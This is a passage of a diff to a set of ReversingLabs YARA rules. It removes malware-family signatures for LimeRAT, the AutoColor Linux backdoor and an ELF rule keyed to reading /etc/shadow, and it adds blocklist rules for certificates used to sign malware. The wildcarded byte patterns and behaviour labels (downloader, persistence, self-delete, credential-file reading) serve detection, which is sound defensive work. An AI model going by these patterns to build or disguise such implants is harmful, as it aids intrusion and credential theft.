-            8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48 83 C2 ?? 48 89 C6 48 89 D7 E8 ?? ?? ??
-            ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 89 D3 49 89 C4 48 8D 85 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 85 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 89 DE 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 85 DB 75 ?? BB ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? EB ?? 89 D3 49 89 C4 48 8D 85 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 DB 74 ?? EB ?? 44 89 F8 48 81 C4 ?? ?? ?? ??
-            5B 41 5C 41 5D 41 5E 41 5F C9 C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $kill_and_restart_daemons_p* ) ) and ( all of ( $network_communication_p* ) ) and ( all of ( $read_etc_shadow_p* ) ) and ( all of ( $list_running_services_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAY LIMITED" and pe.signatures [ i ] . serial == "60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" and 1644278400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Limerat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LimeRAT backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2ef6f27-3fb8-55f4-97a6-9e25a3d1ce49"
-		date = "2024-03-04"
-		modified = "2024-03-04"
+		id = "3f5eee11-4106-5923-9563-84f81199bea0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/ByteCode.MSIL.Backdoor.LimeRAT.yara#L1-L91"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "03eaa2ac41950f036601222b32a28c03aae3b3445501e988e2f87e231a1a1522"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10516-L10532"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a5d603cf64c8a16fa12daf9c6b5d0850e6145fb39b38442ed724ec0f849b8be9"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "LimeRAT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$persistence_mechanism = {
-            02 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 2B ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 28 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? DE
-        }
-		$crypto_miner = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 16 31 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 0B 07 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 2B ?? 09 6F ?? ??
-            ?? ?? 74 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 0A DE ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09
-            6F ?? ?? ?? ?? DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ??
-            0A DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 06
-        }
-		$downloader = {
-            73 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2C ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 7E ?? ?? ?? ?? 07 6F ??
-            ?? ?? ?? 07 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ??
-            06 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 26 00 06 6F ?? ?? ?? ?? 14 0A
-            DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? DE ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ??
-            ?? ?? DE
-        }
-		$network_communication_p1 = {
-            16 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0B 28 ?? ??
-            ?? ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ??
-            ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ??
-            DE ?? 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 6F ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 15 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 14 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ??
-            25 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 14 14 14 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 9A 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 26 11
-            ?? 73 ?? ?? ?? ?? 17 11 ?? 8E 69 6F ?? ?? ?? ?? 9A 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 11
-            ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C
-            ?? 11 ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 17 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72 ??
-            ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 28 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2
-        }
-		$network_communication_p2 = {
-            25 1A 28 ?? ?? ?? ?? A2 25 1B 7E ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 7E ??
-            ?? ?? ?? A2 25 1E 28 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ??
-            ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ??
-            A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2
-            25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25
-            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? 8C ?? ??
-            ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ??
-            ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ??
-            A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2B ?? 7E
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $persistence_mechanism ) and ( $crypto_miner ) and ( $downloader ) and ( all of ( $network_communication_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prod Can Holdings Inc." and pe.signatures [ i ] . serial == "12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" and 1647820800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Backdoor_Autocolor : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AutoColor backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c6fea724-bd3d-56a0-a8c1-2e4d2e549766"
-		date = "2025-04-11"
-		modified = "2025-04-11"
+		id = "5a4abffb-ac0d-5e70-8193-0cd1a83377ac"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Linux.Backdoor.AutoColor.yara#L1-L177"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "068d4d6916437197d4b3ac9c05803a35e15c00b0e70cb61ad6361981dc7cfee3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10534-L10550"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ba1155b30761f48674aaa82a70a06fea30cced6518f089f3f9f173a4eb06a09"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "AutoColor"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$install_library_implant_p1 = {
-            F3 0F 1E FA 55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
-            89 45 ?? 31 C0 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
-            8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48
-            8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ??
-            48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ??
-            ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6
-            48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
-        }
-		$install_library_implant_p2 = {
-            E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? EB ?? 8B 45 ??
-            4C 63 E0 48 8B 5D ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 89 E2 48
-            89 DE 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ??
-            ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
-            ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 D8 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ??
-            ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F
-            1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ??
-            ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F
-            1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81
-            C4 ?? ?? ?? ?? 5B 41 5C 5D C3
-        }
-		$self_delete = {
-            F3 0F 1E FA 55 48 89 E5 53 48 83 EC ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0
-            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 74 ?? 8B 5D ?? EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 5D ?? EB ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
-            E8 ?? ?? ?? ?? 89 D8 48 8B 55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? EB ?? F3 0F 1E FA
-            48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 83 C4 ?? 5B 5D C3
-        }
-		$execute_local_file_p1 = {
-            F3 0F 1E FA 55 48 89 E5 41 55 41 54 53 48 81 EC ?? ?? ?? ?? 48 83 0C 24 ?? 48 81 EC
-            ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 48 89 8D ?? ??
-            ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ?? 41 BC ?? ??
-            ?? ?? 49 89 DD 4D 85 E4 78 ?? 4C 89 EF E8 ?? ?? ?? ?? 49 83 C5 ?? 49 83 EC ?? EB ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 39 85 ?? ?? ?? ?? 7D ??
-            48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48 8B 85 ?? ??
-            ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2
-            48 8D 85 ?? ?? ?? ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? E8 ?? ??
-            ?? ?? 8B 00 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 74
-            ?? 8B 85 ?? ?? ?? ?? 83 C8 ?? 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
-            DE 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 88 ?? ??
-            ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89
-        }
-		$execute_local_file_p2 = {
-            C7 E8 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7D ?? 8B 85 ?? ?? ?? ?? 89
-            C7 E8 ?? ?? ?? ?? 85 C0 83 85 ?? ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 78 ??
-            48 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 01 D0 0F B6 00 3C ?? 75 ?? 48 8B 85
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 83 C2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 48
-            89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 39
-            85 ?? ?? ?? ?? 7D ?? 8B 85 ?? ?? ?? ?? 8D 48 ?? 8B 85 ?? ?? ?? ?? 48 98 48 C1 E0 ??
-            48 8D 75 ?? 48 01 F0 48 2D ?? ?? ?? ?? 48 8B 10 48 63 C1 48 89 94 C5 ?? ?? ?? ?? 83
-        }
-		$execute_local_file_p3 = {
-            85 ?? ?? ?? ?? ?? EB ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 83 C0 ?? 48 98 48 C7 84 C5 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 85
-            ?? ?? ?? ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 41 89 C4 90 48
-            8D 9D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 39 C3 74 ?? 48 83 EB
-            ?? 48 89 DF E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 44 89
-            E0 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? F3 0F 1E
-            FA 49 89 C5 48 85 DB 74 ?? B8 ?? ?? ?? ?? 4C 29 E0 48 C1 E0 ?? 4C 8D 24 03 49 39 DC
-            74 ?? 49 83 EC ?? 4C 89 E7 E8 ?? ?? ?? ?? EB ?? 4C 89 EB EB ?? F3 0F 1E FA 48 89 C3
-            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 49 89 DC EB ?? F3 0F 1E FA 49 89 C4 48
-            8D 9D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 39 C3 74 ?? 48 83 EB
-            ?? 48 89 DF E8 ?? ?? ?? ?? EB ?? 4C 89 E3 EB ?? F3 0F 1E FA 48 89 C3 48 8D 85 ?? ??
-            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81
-            C4 ?? ?? ?? ?? 5B 41 5C 41 5D 5D C3
-        }
-		$network_proxy_communication_p1 = {
-            F3 0F 1E FA 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 83 0C 24 ?? 48 81 EC ?? ?? ?? ?? 48
-            89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0
-            B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 D7 FC F3 48 AB 89 F8 89 CA
-            89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48
-            C2 C1 F8 ?? 89 C6 48 63 C6 48 8B BC C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1
-            EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0 48 09 C7 48 89 FA
-            48 63 C6 48 89 94 C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48 C2
-            C1 F8 ?? 89 C6 48 63 C6 48 8B BC C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1 EA
-            ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0 48 09 C7 48 89 FA 48
-            63 C6 48 89 94 C5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 39 85 ?? ?? ??
-            ?? 7D ?? 48 8B 85 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 39
-            85 ?? ?? ?? ?? 7D ?? 48 8B 85 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 78 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 C6 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
